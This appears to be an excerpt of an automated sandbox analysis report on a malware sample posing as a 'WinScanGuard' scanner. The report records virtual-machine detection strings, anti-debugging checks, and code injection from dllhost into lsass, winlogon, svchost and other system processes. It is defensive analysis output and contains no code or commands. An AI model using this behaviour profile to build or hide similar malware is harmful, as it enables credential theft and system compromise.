Source: Amcache.hve.10.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: svchost.exe, 0000001B.00000000.2053370128.000002A660662000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000026.00000002.2905390064.000002295CE00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.10.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.10.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicheartbeatNT SERVICE
Source: Amcache.hve.10.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.10.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: dwm.exe, 0000001E.00000002.2933213881.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Amcache.hve.10.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Process information queried: ProcessInformation
Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00BDBBEDC FindFirstFileExW,13_2_000001A00BDBBEDC
Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B62BEDC FindFirstFileExW,16_2_0000020D0B62BEDC
Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF61550823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,16_2_00007FF61550823C
Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615502978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,16_2_00007FF615502978
Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_00007FF6154F1560
Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,16_2_00007FF6154F35B8
Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615517B4C FindFirstFileW,FindNextFileW,FindClose,16_2_00007FF615517B4C
Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_00000242878BBEDC FindFirstFileExW,21_2_00000242878BBEDC
Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC64BEDC FindFirstFileExW,24_2_00000225DC64BEDC
Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0AEBEDC FindFirstFileExW,25_2_00000202C0AEBEDC
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Code function: 26_2_04029AE0 FindFirstFileExW,26_2_04029AE0
Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A66130BEDC FindFirstFileExW,27_2_000002A66130BEDC
Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A66136BEDC FindFirstFileExW,27_2_000002A66136BEDC
Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB14BBEDC FindFirstFileExW,30_2_000002BAB14BBEDC
Source: C:\Windows\System32\svchost.exe | Code function: 31_2_0000026A87F4BEDC FindFirstFileExW,31_2_0000026A87F4BEDC
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000179537ABEDC FindFirstFileExW,36_2_00000179537ABEDC
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000017953D4BEDC FindFirstFileExW,36_2_0000017953D4BEDC
Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_00007FF7142F1008 GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,UnregisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,13_2_00007FF7142F1008
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Code function: 26_2_04000CE3 mov eax, dword ptr fs:[00000030h] 26_2_04000CE3
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Code function: 26_2_040075D8 mov eax, dword ptr fs:[00000030h] 26_2_040075D8
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Code function: 26_2_040087F7 mov eax, dword ptr fs:[00000030h] 26_2_040087F7
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Code function: 26_2_040218E3 mov eax, dword ptr fs:[00000030h] 26_2_040218E3
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Code function: 26_2_040281D8 mov eax, dword ptr fs:[00000030h] 26_2_040281D8
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Code function: 26_2_040293F7 mov eax, dword ptr fs:[00000030h] 26_2_040293F7
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\dllhost.exe | Process queried: DebugPort
Source: C:\Windows\$sxr-powershell.exe | Process queried: DebugPort
Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00BDB7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000001A00BDB7F10
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140001368 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModules,ReadProcessMemory,CloseHandle,FindCloseChangeNotification,GetProcessHeap,HeapFree,RtlDeleteBoundaryDescriptor,HeapFree,6_2_0000000140001368
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\dllhost.exe | Process token adjusted: Debug
Source: C:\Windows\$sxr-powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\dllhost.exe | Process token adjusted: Debug
Source: C:\Windows\$sxr-powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\dllhost.exe | Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\dllhost.exe | Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\dllhost.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Memory allocated: page read and write | page guard
Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00BDB7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000001A00BDB7F10
Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00BDBB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000001A00BDBB5AC
Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_00007FF7142F1ADC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF7142F1ADC
Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_00007FF7142F1800 SetUnhandledExceptionFilter,13_2_00007FF7142F1800
Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B627F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000020D0B627F10
Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B62B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000020D0B62B5AC
Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615508FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF615508FA4
Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6155093B0 SetUnhandledExceptionFilter,16_2_00007FF6155093B0
Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_00000242878BB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000242878BB5AC
Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_00000242878B7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000242878B7F10
Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC64B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000225DC64B5AC
Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC647F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000225DC647F10
Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0AE7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_00000202C0AE7F10
Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0AEB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_00000202C0AEB5AC
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Code function: 26_2_04029428 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_04029428
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Code function: 26_2_04026964 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_04026964
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Code function: 26_2_0402667A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_0402667A
Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A661307F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002A661307F10
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66130B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002A66130B5AC
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A661367F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002A661367F10
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66136B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002A66136B5AC
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14B7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000002BAB14B7F10
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14BB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000002BAB14BB5AC
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A87F47F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0000026A87F47F10
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A87F4B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0000026A87F4B5AC
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000179537AB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00000179537AB5AC
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000179537A7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00000179537A7F10
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000017953D4B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_0000017953D4B5AC
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000017953D47F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_0000017953D47F10

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1A0000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 4000000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 20E0000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 23C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A661330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A661390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A879C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2F90000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 2230000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 23E0000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A661450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAB14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 179537D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25306E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6613F0000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3200000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 2250000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 2400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe base: 1470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC6129A0
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB29A0
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D29A0
Source: C:\Windows\SysWOW64\dllhost.exe Thread created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe EIP: 4002102
Source: C:\Windows\SysWOW64\dllhost.exe Thread created: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe EIP: 20E2102
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DC6729A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0B129A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 613329A0
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AF1D29A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DC6F29A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0B729A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 613929A0
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AF2029A0
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 879C29A0
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 537729A0
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D5329A0
Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 2F92102
Source: C:\Windows\SysWOW64\dllhost.exe Thread created: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe EIP: 2232102
Source: C:\Windows\SysWOW64\dllhost.exe Thread created: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe EIP: 23E2102
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DC7B29A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0C329A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 614529A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B14E29A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 87F729A0
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 537D29A0
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D5929A0
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6E629A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B3929A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EBFD29A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 590429A0
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A9E729A0
